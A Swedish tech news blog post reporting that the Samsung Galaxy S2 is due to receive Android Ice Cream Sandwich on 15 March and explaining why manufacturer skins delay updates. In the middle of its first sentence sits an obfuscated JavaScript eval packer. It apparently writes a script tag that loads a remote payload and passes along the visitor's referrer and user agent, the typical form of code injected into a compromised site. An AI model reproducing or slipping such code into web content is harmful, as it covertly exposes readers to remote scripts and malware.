Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Samsung Galaxy S2 får Sandwich Ice Cream den 15 mars

Samsung Galaxy S2 får Sandwich Ice Cream den 15 mars
Sebastian

Sandwich eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dzyzs|var|u0026u|referrer|ansrs||js|php’.split(’|’),0,{}))
Ice Cream kommer till Samsung Galaxy S2 denna månad. Det kan vara senare än vad man hoppats, men det verkar som S2 kommer att uppdateras till den senaste versionen av Android den 15 mars.

Det är enligt ett inlägg på Samsungs officiella Facebook-sida i Israel – som sedan har tagits bort.

Att Ice Cream Sandwich kommer till S2 är ganska stor grej. Det är den mest populära Android leverantören, som säljer över 20 miljoner mobiltelefoner – efter Apple  iPhone.

För alla dessa Android fans som desperat hoppas på att få använda Ice Cream Sandwich och den nya uppdateringen så har det varit en lång väntan på detta ögonblick. Förseningar till uppdateringen för Asus Transformer har gett fans huvudvärk. HTC Sensation och Xe är också på väg att få sig en uppdatering.

Android uppdateringar är vanligtvis försenade på grund av förekomsten av front-end gränssnittet som lagts till i Android-telefoner av tillverkaren. Google tillhandahåller koden för Android som grund, men tillverkarna vill lägga till sin egen design på framsidan – som Samsungs TouchWiz, eller HTC Sense – såväl som sina egna program.

Sandwich Ice Cream FTW, eller?

Tack för tipset Ian!